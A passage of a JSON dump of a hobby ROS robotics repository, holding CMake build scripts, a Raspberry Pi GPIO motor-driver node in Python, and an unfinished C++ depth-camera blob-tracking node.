CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/lib/python2.7/dist-packages\" TYPE DIRECTORY FILES \"/home/will/catkin_ws/devel/lib/python2.7/dist-packages/basic_teleop\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/lib/pkgconfig\" TYPE FILE FILES \"/home/will/catkin_ws/build/basic_teleop/catkin_generated/installspace/basic_teleop.pc\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/basic_teleop/cmake\" TYPE FILE FILES \"/home/will/catkin_ws/build/basic_teleop/catkin_generated/installspace/basic_teleop-msg-extras.cmake\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/basic_teleop/cmake\" TYPE FILE FILES\n \"/home/will/catkin_ws/build/basic_teleop/catkin_generated/installspace/basic_teleopConfig.cmake\"\n \"/home/will/catkin_ws/build/basic_teleop/catkin_generated/installspace/basic_teleopConfig-version.cmake\"\n )\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/basic_teleop\" TYPE FILE FILES \"/home/will/catkin_ws/src/basic_teleop/package.xml\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\n"
},
{
"alpha_fraction": 0.6219292879104614,
"alphanum_fraction": 0.6512882113456726,
"avg_line_length": 27.288135528564453,
"blob_id": "10f4f8e912b6d092e166aefb244a0deb0f95500d",
"content_id": "a3034283ac5eb1fa867a3f4c65151f7f245b0c94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1669,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 59,
"path": "/src/basic_teleop/scripts/teleop.py",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport rospy\nimport time\nimport RPi.GPIO as GPIO\n\nfrom std_msgs.msg import String\nfrom basic_teleop.msg import *\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(17,GPIO.OUT)\nGPIO.setup(18,GPIO.OUT)\nGPIO.setup(22,GPIO.OUT)\nGPIO.setup(23,GPIO.OUT)\n\ndef callback(data):\n rospy.loginfo(rospy.get_caller_id() + \"I heard %s\", data.direction)\n if data.direction == \"bwd\":\n\tGPIO.output(17, True)\n \tGPIO.output(18, False)\n\tGPIO.output(22, False)\n\tGPIO.output(23, True)\n elif data.direction == \"fwd\":\n GPIO.output(17, False)\n GPIO.output(18, True)\n GPIO.output(22, True)\n GPIO.output(23, False)\n elif data.direction == \"cw\":\n GPIO.output(17, False)\n GPIO.output(18, True)\n GPIO.output(22, False)\n GPIO.output(23, True)\n elif data.direction == \"ccw\":\n GPIO.output(17, True)\n GPIO.output(18, False)\n GPIO.output(22, True)\n GPIO.output(23, False)\n time.sleep(data.duration/2)\n GPIO.output(17, False)\n GPIO.output(18, False)\n GPIO.output(22, False)\n GPIO.output(23, False)\n\n \ndef listener():\n # In ROS, nodes are uniquely named. If two nodes with the same\n # node are launched, the previous one is kicked off. The\n # anonymous=True flag means that rospy will choose a unique\n # name for our 'listener' node so that multiple listeners can\n # run simultaneously.\n rospy.init_node('driver', anonymous=True)\n\n rospy.Subscriber(\"movement\", Move, callback)\n print \"ready to hear\"\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n\nif __name__ == '__main__':\n listener()\n"
},
{
"alpha_fraction": 0.5221611857414246,
"alphanum_fraction": 0.5463816523551941,
"avg_line_length": 30.819032669067383,
"blob_id": "16939d1f9197974acc679373d90f0fff70f8fbd0",
"content_id": "b3ff8cba77d1ee3c566446afd5cd95d2e87e79da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 20396,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 641,
"path": "/src/basic_teleop/src/predictive_director.cpp",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "//Imports\n#include \"ros/ros.h\"\n#include \"std_msgs/String.h\"\n#include <sensor_msgs/Image.h>\n#include <sstream>\n#include \"basic_teleop/Move.h\"\n#include \"limits.h\"\n#include <typeinfo>\n#include \"sensor_msgs/CameraInfo.h\"\n#include <cmath>\n#include <boost/date_time.hpp>\n#include <boost/lexical_cast.hpp>\n#include <array>\n#include <vector>\n#include <algorithm>\n#include <fstream>\n#include <iostream>\n#include <stdlib.h>\n\n//Constants\n#define WIDTH 320\n#define HEIGHT 240\n#define PRINT_NAME(x) std::cout << #x << \" - \" << typeid(x).name() << '\\n' // For Debugging\n#define DEGREES_PER_SECOND 90\n#define X_SHIFT .16\n#define BLOB_TOLERANCE 15\n#define BLOB_MIN_SIZE 25\n#define HORIZON 138\n\n//Namespaces\nnamespace btt = boost::posix_time;\n\n\n//Types and Classes\nunion depth_data { //For processing data as mm values\n unsigned char raw[WIDTH * HEIGHT * 2]; //uint8 counterpart\n unsigned short int mm[WIDTH * HEIGHT]; //unit16 counterpart\n};\n\nclass point2d {\n public:\n point2d(int x, int y) : x(x), y(y) {};\n int x;\n int y;\n};\n\nclass point2dDepth {\n public:\n point2dDepth() : x(0), y(0), depth(0.0) {};\n point2dDepth(int x, int y, double d) : x(x), y(y), depth(d) {};\n int x;\n int y;\n double depth;\n inline bool operator == (const point2dDepth &other) {\n //ROS_INFO(\"Point Comparison: %d %d %d %d\", x, y, other.x, other.y);\n //ROS_INFO(\"Val: %d\", (x == other.x) && (y == other.y));\n return (x == other.x) && (y == other.y);\n }\n};\n\nclass point3d {\n public:\n point3d(double x, double y, double z) : x(x), y(y), z(z) {};\n double x;\n double y;\n double z;\n};\n\ntemplate<class T>\nclass Blob {\n public:\n Blob() : including() {};\n Blob(T point) {\n including = { point };\n } \n Blob(std::vector<T> i) : including(i) {};\n int getArea() {return 0;};\n std::array<int, 2> getCenter() {return std::array<int, 2> { {0, 0} }; };\n bool inBlob(T point) {\n for(int i = 0; i < including.size(); i++) { //Switch to more efficient search later\n if (including[i] == point) {\n return true;\n }\n }\n return false;\n }\n bool isEmpty() {\n return including.size() == 0; \n }\n int numMembers() {\n return including.size();\n }\n void addPoint(T point) {\n including.push_back(point);\n }\n private:\n std::vector<T> including;\n};\n\n//Globals\nsensor_msgs::CameraInfo camera;\nbasic_teleop::Move last_dir;\nBlob<point2dDepth> last_blob;\nstd::array<float, 3> last_untransformed;\nstd::array<float, 3> velocity; // m/s\nbtt::ptime last_time = btt::microsec_clock::universal_time();\nbool received_first = false;\nbool received_2 = false;\nbool calibrate_lag = false;\ndepth_data d;\n\n//Protofunctions\ndepth_data smoothFrame(const depth_data&);\nshort int average_pixel(const depth_data&, int, int);\nvoid sort_into_by_depth(std::vector<point2dDepth>*, point2dDepth);\nstd::vector<point2dDepth> get_higher_neighbors(const point2dDepth&, const depth_data&);\nint decide_lindeberg_case(point2dDepth, const std::vector<point2dDepth>&, std::vector<point2dDepth>*, std::vector<Blob<point2dDepth>>);\nint getXY(const depth_data&, int, int);\npoint2dDepth getXY(const depth_data&, point2d);\nvoid print_closest_point_pixel_coords(const depth_data&);\nstd::array<float, 3> conv_to_3d(const depth_data&, int, int, const double*);\nstd::array<int, 2> conv_to_2d(const std::array<float, 3>, const double*);\nvoid change_velocity(const std::array<float, 3>);\n\n//Class Member Definitions\n\n\n//Helper Definitions\n\ndepth_data smoothFrame(const depth_data& frame) {\n depth_data smoothed;\n for(int x = 0; x < WIDTH; x++) {\n for(int y = 0; y < HEIGHT; y++) {\n smoothed.mm[x + (y * WIDTH)] = average_pixel(frame, x, y);\n }\n }\n return smoothed;\n}\n\nshort int average_pixel(const depth_data& frame, int x, int y) {\n short int averaged = (( getXY(frame, x + 1, y)\n + getXY(frame, x + 1, y + 1)\n + getXY(frame, x + 1, y - 1)\n + getXY(frame, x, y)\n + getXY(frame, x, y + 1)\n + getXY(frame, x, y - 1)\n + getXY(frame, x - 1, y)\n + getXY(frame, x - 1, y + 1)\n + getXY(frame, x - 1, y - 1)) / 9);\n if (averaged > 0) {\n ROS_INFO(\"Found nonzero average %d, %d: %d\", x, y, averaged);\n }\n return averaged;\n}\n\nstd::vector<Blob<point2dDepth>> blobFrame(const depth_data& frame) {\n std::vector<Blob<point2dDepth>> output;\n\n depth_data sFrame = smoothFrame(frame); \n \n ROS_INFO(\"Checking depth on smoothed frame: %d\", getXY(sFrame, 280, 1));\n\n \n //transform grid to pixel array - ignore things below the horizon\n std::vector<point2dDepth> sorted;\n for (int x = 0; x < WIDTH; x++) {\n for (int y = 0; y < HORIZON; y++) {\n sort_into_by_depth(&sorted, getXY(sFrame, point2d(x, y)));\n }\n }\n\n /*for (int k = 0; k < sorted.size(); k++) {\n if (sorted[k].depth < 0.1) {\n ROS_INFO(\"Pixel #%d: %d, %d depth: %f\", k, sorted[k].x, sorted[k].y, sorted[k].depth);\n while(true) {};\n } \n }*/\n\n //while(true) {}; // halt program\n\n //sort pixels into blobs + background\n\n int counter = 0;\n std::vector<point2dDepth> background;\n for (int i = 0; i < sorted.size(); i++) {\n point2dDepth p = sorted[i];\n std::vector<point2dDepth> neighbors = get_higher_neighbors(p, sFrame);\n //ROS_INFO(\"[%d, %d]\", p.x, p.y); \n if(neighbors.size() == 0) {\n point2dDepth plateau_check = sorted[i-1];\n if (p.depth != 0 && p.depth >= plateau_check.depth - .000001 && p.depth <= plateau_check.depth + .000001 && // actually I hate doubles\n plateau_check.x <= p.x + 1 &&\n plateau_check.x >= p.x - 1 &&\n plateau_check.y <= p.y + 1 &&\n plateau_check.y >= p.y - 1) { //deal with edge case of equal height neighbors\n ROS_INFO(\"Pleateau case found (%d, %d, %f), blobs found %d\", plateau_check.x, plateau_check.y, plateau_check.depth, output.size());\n //ROS_INFO(\"Test: %d\", plateau_check.x, plateau_check.y, plateau_check.depth, output.size());\n for (Blob<point2dDepth> b : output) {\n if (b.inBlob(plateau_check)) {\n b.addPoint(p);\n ROS_INFO(\"Found Blob For Point with %d members\", b.numMembers());\n //while (true) {} ;\n break;\n } \n }\n continue;\n } \n \n if(output.size() >= 9) {\n background.push_back(p);\n continue; \n }\n output.push_back(Blob<point2dDepth>(p));\n }\n //else if(p.depth > 1.0) {\n // background.push_back\n //}\n else {\n decide_lindeberg_case(p, neighbors, &background, output);\n }\n counter++;\n //ROS_INFO(\"[Classified: %d]\", counter); \n }\n \n //sort blobs by closeness/size?\n\n //return blobs sorted by closeness/size?\n ROS_INFO(\"Pixel 0, 0 depth: %d\", getXY(sFrame, 0, 0));\n ROS_INFO(\"Pixel 1, 0 depth: %d\", getXY(sFrame, 1, 0));\n ROS_INFO(\"Pixel 2, 0 depth: %d\", getXY(sFrame, 2, 0));\n return output;\n}\n\nvoid sort_into_by_depth(std::vector<point2dDepth>* v, point2dDepth p) { //given that V is sorted\n for(int i = 0; i < v->size(); i++) {\n //ROS_INFO(\"[Depth: %f]\", p.depth);\n if (p.depth > 0.2 && (p.depth <= v->at(i).depth || v->at(i).depth == 0) ) {//20cm is below the tolerance of the sensor, and if you've hit the zeros you should stop\n v->insert(v->begin() + i, p);\n return;\n }\n }\n if(p.depth > 0){\n ROS_INFO(\"[Mid Sorted Number: %d]\", v->size());\n }\n v->push_back(p);\n}\n\nstd::vector<point2dDepth> get_higher_neighbors(const point2dDepth& p, const depth_data& frame) {\n std::vector<point2dDepth> output;\n point2dDepth temp;\n \n temp = getXY(frame, point2d(p.x + 1, p.y));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n }\n\n temp = getXY(frame, point2d(p.x + 1, p.y + 1));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n }\n\n temp = getXY(frame, point2d(p.x + 1, p.y - 1));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n } \n \n temp = getXY(frame, point2d(p.x, p.y + 1));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n }\n\n temp = getXY(frame, point2d(p.x, p.y - 1));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n }\n\n temp = getXY(frame, point2d(p.x - 1, p.y));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n }\n\n temp = getXY(frame, point2d(p.x - 1, p.y + 1));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n }\n\n temp = getXY(frame, point2d(p.x - 1, p.y - 1));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n }\n \n if (p.depth > 0) {\n ROS_INFO(\"Found nonzero point %d, %d, %f\", p.x, p.y, p.depth);\n ROS_INFO(\"Neighbornum: %d\", output.size());\n //while(true){}; //Next step is how to solve edge case of equal neighbors\n }\n return output;\n}\n\nint decide_lindeberg_case(point2dDepth point, const std::vector<point2dDepth>& neighbors, std::vector<point2dDepth>* background, std::vector<Blob<point2dDepth>> blobs) {\n Blob<point2dDepth>* potentialBlob;\n //ROS_INFO(\"[Neighbor Number: %d]\", neighbors.size());\n //ROS_INFO(\"[Background Number: %d]\", background->size());\n //ROS_INFO(\"[Blob Number: %d]\", blobs.size()); \n for(point2dDepth neighbor : neighbors) {\n \n if(std::find(background->begin(), background->end(), neighbor) != background->end()) {\n background->push_back(point); // is pushing back better o(n) than putting to the front for searching in the background?? \n return 0;\n }\n else if (potentialBlob == NULL) {\n for (Blob<point2dDepth> b : blobs) {\n if (b.inBlob(neighbor)){\n potentialBlob = &b;\n break;\n }\n }\n }\n else {\n if (!potentialBlob->inBlob(neighbor)) {\n background->push_back(point);\n return 1;\n }\n }\n }\n potentialBlob->addPoint(point);\n return 2;\n} \n\nvoid printFrameWithBlobs(std::vector<Blob<point2dDepth>> blobs) {\n std::ofstream outFile;\n outFile.open(\"output.txt\");\n ROS_INFO(\"[Blob number: %d]\", blobs.size());\n for(int row = 0; row < HEIGHT; row++) {\n std::string oneRow;\n for(int col = 0; col < WIDTH; col++) {\n bool added = false;\n if(row >= HORIZON) {\n oneRow += \"0\";\n continue;\n }\n for(int k = 0; k < blobs.size(); k++) {\n if(blobs[k].inBlob(point2dDepth(col, row, 0))) {\n oneRow += boost::lexical_cast<std::string>(k + 1);\n added = true;\n break;\n }\n }\n if(!added) {\n oneRow += \"0\";\n }\n }\n //ROS_INFO(\"[%s]\", oneRow.c_str());\n outFile<<oneRow.c_str();\n outFile<<\"\\n\";\n }\n outFile.close();\n}\n\ninline int getXY(const depth_data& grid, int x, int y) {\n if( x > 0 && x < WIDTH && y > 0 && y < HEIGHT) {\n return grid.mm[x + (y * WIDTH)];\n }\n return 0;\n}\n\n\ninline point2dDepth getXY(const depth_data& grid, point2d p) {\n if( p.x > 0 && p.x < WIDTH && p.y > 0 && p.y < HEIGHT && getXY(grid, p.x, p.y) > 0) {\n return point2dDepth(p.x, p.y, getXY(grid, p.x, p.y)/1000.0); // + (rand() % 100)/ 100000.0); // add random distribution to points to try to avoid strict equality during smoothing\n }\n return point2dDepth(p.x, p.y, 0.0);\n}\n\nvoid set_camera_info(sensor_msgs::CameraInfo c){\n camera = c;\n}\n\nstd::array<float, 3> conv_to_3d(const depth_data& grid, int x, int y, const double* intr){\n //using default values found online \n float cx = 319.5;// intr[2];\n float cy = 239.5;// intr[5];\n float fx_inv = 1.0 / 525.0;// intr[0];\n float fy_inv = 1.0 / 525.0;// intr[4];\n\n float zO = getXY(grid, x, y) * .001; // z\n float xO = (zO * ((x - cx) * fx_inv)) + X_SHIFT; //x\n float yO = zO * ((y - cy) * fy_inv); //y\n\n return std::array<float, 3> { {xO, yO, zO} };\n}\n\nstd::array<int, 2> conv_to_2d(const std::array<float, 3> in, const double* intr){\n //using default values found online \n float cx = 319.5;// intr[2];\n float cy = 239.5;// intr[5];\n float fx = 525.0;// intr[0];\n float fy = 525.0;// intr[4]; \n\n return std::array<int, 2> { \n {(((in[0] - X_SHIFT) * fx) / in[2]) + cx,\n ((in[1] * fy) / in[2]) + cy}\n };\n}\n\nstd::array<float, 3> rotate_point_around_robot(const std::array<float, 3> in, float angle) {\n float x = in[0];// height doesn't change with turning\n float z = in[2];\n\n angle = angle*M_PI/180; // Convert to radians\n \n float pivX = 0; //point around center of robot\n float pivZ = -.06;\n\n x -= pivX;\n z -= pivZ;\n\n x = x*cos(angle) - z*sin(angle);\n z = z*cos(angle) + x*sin(angle);\n\n x += pivX;\n z += pivZ;\n\n return std::array<float, 3> { {x, in[1], z} }; //care for pointer problems\n}\n\nvoid change_velocity(const std::array<float, 3> new_transformed) {\n double time_passed = (btt::microsec_clock::universal_time() - last_time).total_milliseconds() / 1000.0; //In Seconds \n float angle_turned = DEGREES_PER_SECOND * time_passed;\n if (last_dir.direction == \"ccw\") {\n angle_turned *= -1.0; // is this right for undoing the turning? - since cw is in the negative direction, flip \n }\n else if (last_dir.direction == \"fwd\") {\n angle_turned = 0;\n }\n\n std::array<float, 3> temp = rotate_point_around_robot(new_transformed, angle_turned); // undo expected rotation\n\n if (last_blob.inBlob(point2dDepth(conv_to_2d(temp, camera.K.data())[0], conv_to_2d(temp, camera.K.data())[1], 0))) {\n velocity[0] = 0;\n velocity[1] = 0;\n velocity[2] = 0;\n }\n else {\n velocity[0] = (temp[0] - last_untransformed[0]) / time_passed;\n velocity[1] = (temp[1] - last_untransformed[1]) / time_passed;\n velocity[2] = (temp[2] - last_untransformed[2]) / time_passed;\n }\n ROS_INFO(\"Temp[0]: %f\", temp[0]);\n ROS_INFO(\"last_untransf[0]: %f\", last_untransformed[0]);\n ROS_INFO(\"Time passed: %f\", time_passed);\n ROS_INFO(\"New Vel (x,y,z): [%f, %f, %f]\", velocity[0], velocity[1], velocity[2]);\n}\n\nstd::array<float, 3> predict_new_center() {\n double time_passed = (btt::microsec_clock::universal_time() - last_time).total_milliseconds() / 1000.0; //In Seconds \n std::array<float, 3> new_center { {0.0, 0.0, 0.0} };\n new_center[0] = last_untransformed[0] + (velocity[0] * time_passed); //apply predicted movement \n //of target\n new_center[1] = last_untransformed[1] + (velocity[1] * time_passed);\n new_center[2] = last_untransformed[2] + (velocity[2] * time_passed); \n\n float angle_turned = DEGREES_PER_SECOND * time_passed;\n \n if (last_dir.direction.data() == \"cw\") {\n angle_turned *= -1.0;\n }\n\n return rotate_point_around_robot(new_center, angle_turned); // apply predicted movement of robot\n}\n\nvoid print_closest_point_pixel_coords(const depth_data& grid) {\n int out_x, out_y;\n int farthest = INT_MAX; \n for(int x = 0; x < WIDTH; x++){\n for(int y = 0; y < HEIGHT; y++){\n if ((getXY(grid, x, y) < farthest) && (getXY(grid, x, y) != 0)){\n out_x = x;\n out_y = y;\n farthest = getXY(grid, x, y);\n }\n }\n }\n ROS_INFO(\"I heard: [%d, %d]\", out_x, out_y);\n}\n\nvoid print_type_shortcuts() {\n PRINT_NAME(char);\n PRINT_NAME(signed char);\n PRINT_NAME(unsigned char);\n PRINT_NAME(short);\n PRINT_NAME(unsigned short);\n PRINT_NAME(int);\n PRINT_NAME(unsigned int);\n PRINT_NAME(long);\n PRINT_NAME(unsigned long);\n PRINT_NAME(float);\n PRINT_NAME(double);\n PRINT_NAME(long double);\n PRINT_NAME(char*);\n PRINT_NAME(const char*);\n}\n\n//Ros Functions\n\nvoid callback(sensor_msgs::Image frame) { \n depth_data grid;\n memcpy(&grid, frame.data.data(), sizeof(depth_data));\n d = grid;\n Blob<point2dDepth> b;// = Blob(grid); \n \n std::array<int, 2> center = b.getCenter();\n std::array<float, 3> real_coords = conv_to_3d(grid, center[0], center[1], camera.K.data()); //may need to convert camera data\n \n /*\n ROS_INFO(\"Center At: [%d, %d]\", center[0], center[1]); //For Debugging\n ROS_INFO(\"Area: [%d]\", b.getArea());\n ROS_INFO(\"Real World Last (x,y,z): [%f, %f, %f]\", last_untransformed[0], last_untransformed[1], last_untransformed[2]);\n ROS_INFO(\"Real World Real (x,y,z): [%f, %f, %f]\", real_coords[0], real_coords[1], real_coords[2]);*/\n\n if (received_first) { // make sure we have real starting point to compare against \n change_velocity(real_coords);\n }\n \n last_untransformed[0] = real_coords[0];\n last_untransformed[1] = real_coords[1];\n last_untransformed[2] = real_coords[2]; \n last_time = btt::microsec_clock::universal_time();\n //last_blob = b;\n\n if (!received_first) {\n received_first = true; \n }\n else if (!received_2) {\n received_2 = true;\n }\n}\n\n/*\nint main(int argc, char **argv)\n{\n\n ros::init(argc, argv, \"predictive_director\");\n\n ros::NodeHandle n;\n\n ros::Subscriber temp = n.subscribe(\"/openni2_camera/depth/camera_info\", 1000, set_camera_info);\n\n while(&camera == NULL) {//wait until we have camera information\n continue; \n }\n\n temp.~Subscriber();\n\n ros::Subscriber sub = n.subscribe(\"/openni2_camera/depth/image_raw\", 1000, callback);\n ros::Publisher dir_pub = n.advertise<basic_teleop::Move>(\"movement\", 1000);\n\n ros::Rate loop_rate(10); \n \n last_dir.direction = \"fwd\";\n\n while (ros::ok())\n {\n \n while(!received_2) { // wait until we have valid velocity data\n ros::spinOnce();\n\n loop_rate.sleep();\n } \n\n ROS_INFO(\"Last pub-ed: [%s]\", last_dir.direction.data()); \n\n std::array<float, 3> new_center = predict_new_center(); \n\n basic_teleop::Move next;\n\n std::array<int, 2> temp_2d = conv_to_2d(new_center, camera.K.data());\n\n if(temp_2d[0] >= 130 && temp_2d[0] <= 190) {\n next.direction = \"fwd\";\n }\n else if(temp_2d[0] < 130){ // to the right of the robot is lower values\n next.direction = \"cw\";\n }\n else {\n next.direction = \"ccw\";\n }\n \n dir_pub.publish(next);\n last_dir = next; \n \n ros::spinOnce();\n\n loop_rate.sleep();\n ++count;\n }\n \n return 0;\n}*/\n\nint main(int argc, char **argv)\n{ \n // ros::init(argc, argv, \"predictive_director\");\n ros::Time::init();\n //ros::NodeHandle n;\n\n //ros::Subscriber temp = n.subscribe(\"/openni2_camera/depth/camera_info\", 1000, set_camera_info);\n\n //while(&camera == NULL) {//wait until we have camera information\n // continue; \n //}\n\n //temp.~Subscriber();\n\n //ros::Subscriber sub = n.subscribe(\"/openni2_camera/depth/image_raw\", 1000, callback);\n //ros::Publisher dir_pub = n.advertise<basic_teleop::Move>(\"movement\", 1000);\n\n ros::Rate loop_rate(.1); \n \n last_dir.direction = \"fwd\";\n \n /*while(!received_2) { // wait until we have valid velocity data\n ros::spinOnce();\n\n loop_rate.sleep();\n }*/\n \n // Fake Image for debugging purposes\n d.mm[100] = 4500;\n d.mm[200] = 5400;\n d.mm[300] = 6300;\n d.mm[400] = 7200;\n d.mm[500] = 8100;\n d.mm[600] = 9000;\n d.mm[700] = 9900;\n d.mm[800] = 10800;\n d.mm[900] = 11700;\n loop_rate.sleep();\n printFrameWithBlobs(blobFrame(d)); \n\n};\n"
},
{
"alpha_fraction": 0.7833753228187561,
"alphanum_fraction": 0.7833753228187561,
"avg_line_length": 38.70000076293945,
"blob_id": "a62c39c6ac7a3632c39a7fba44b9a6a754205420",
"content_id": "adfd49004884677ee8ea5a37f2fb3cc52b93a104",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 397,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 10,
"path": "/build/basic_teleop/CMakeFiles/basic_teleop_generate_messages_eus.dir/cmake_clean.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "FILE(REMOVE_RECURSE\n \"CMakeFiles/basic_teleop_generate_messages_eus\"\n \"/home/will/catkin_ws/devel/share/roseus/ros/basic_teleop/msg/Move.l\"\n \"/home/will/catkin_ws/devel/share/roseus/ros/basic_teleop/manifest.l\"\n)\n\n# Per-language clean rules from dependency scanning.\nFOREACH(lang)\n INCLUDE(CMakeFiles/basic_teleop_generate_messages_eus.dir/cmake_clean_${lang}.cmake OPTIONAL)\nENDFOREACH(lang)\n"
},
{
"alpha_fraction": 0.7873303294181824,
"alphanum_fraction": 0.7873303294181824,
"avg_line_length": 26.625,
"blob_id": "c46effb2ed06702b3231d550f752fe48d2c753a0",
"content_id": "1befa59db4fa4453b4733ff27692a42566317e73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 221,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 8,
"path": "/build/file_server/CMakeFiles/file_server_geneus.dir/cmake_clean.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "FILE(REMOVE_RECURSE\n \"CMakeFiles/file_server_geneus\"\n)\n\n# Per-language clean rules from dependency scanning.\nFOREACH(lang)\n INCLUDE(CMakeFiles/file_server_geneus.dir/cmake_clean_${lang}.cmake OPTIONAL)\nENDFOREACH(lang)\n"
},
{
"alpha_fraction": 0.7700473070144653,
"alphanum_fraction": 0.7703031301498413,
"avg_line_length": 35.032257080078125,
"blob_id": "a743e3dc7a0cf153f42ac505179a54a1a0263f06",
"content_id": "4c31b66704372a162bcad5cb33321c85aca04c61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 7819,
"license_type": "no_license",
"max_line_length": 250,
"num_lines": 217,
"path": "/build/basic_teleop/cmake/basic_teleop-genmsg.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.cmake.em\n\nmessage(STATUS \"basic_teleop: 1 messages, 0 services\")\n\nset(MSG_I_FLAGS \"-Ibasic_teleop:/home/will/catkin_ws/src/basic_teleop/msg;-Istd_msgs:/opt/ros/jade/share/std_msgs/cmake/../msg;-Isensor_msgs:/opt/ros/jade/share/sensor_msgs/cmake/../msg;-Igeometry_msgs:/opt/ros/jade/share/geometry_msgs/cmake/../msg\")\n\n# Find all generators\nfind_package(gencpp REQUIRED)\nfind_package(geneus REQUIRED)\nfind_package(genlisp REQUIRED)\nfind_package(genpy REQUIRED)\n\nadd_custom_target(basic_teleop_generate_messages ALL)\n\n# verify that message/service dependencies have not changed since configure\n\n\n\nget_filename_component(_filename \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\" NAME_WE)\nadd_custom_target(_basic_teleop_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"basic_teleop\" \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\" \"\"\n)\n\n#\n# langs = gencpp;geneus;genlisp;genpy\n#\n\n### Section generating for lang: gencpp\n### Generating Messages\n_generate_msg_cpp(basic_teleop\n \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/basic_teleop\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_cpp(basic_teleop\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/basic_teleop\n \"${ALL_GEN_OUTPUT_FILES_cpp}\"\n)\n\nadd_custom_target(basic_teleop_generate_messages_cpp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_cpp}\n)\nadd_dependencies(basic_teleop_generate_messages basic_teleop_generate_messages_cpp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\" NAME_WE)\nadd_dependencies(basic_teleop_generate_messages_cpp _basic_teleop_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(basic_teleop_gencpp)\nadd_dependencies(basic_teleop_gencpp basic_teleop_generate_messages_cpp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS basic_teleop_generate_messages_cpp)\n\n### Section generating for lang: geneus\n### Generating Messages\n_generate_msg_eus(basic_teleop\n \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/basic_teleop\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_eus(basic_teleop\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/basic_teleop\n \"${ALL_GEN_OUTPUT_FILES_eus}\"\n)\n\nadd_custom_target(basic_teleop_generate_messages_eus\n DEPENDS ${ALL_GEN_OUTPUT_FILES_eus}\n)\nadd_dependencies(basic_teleop_generate_messages basic_teleop_generate_messages_eus)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\" 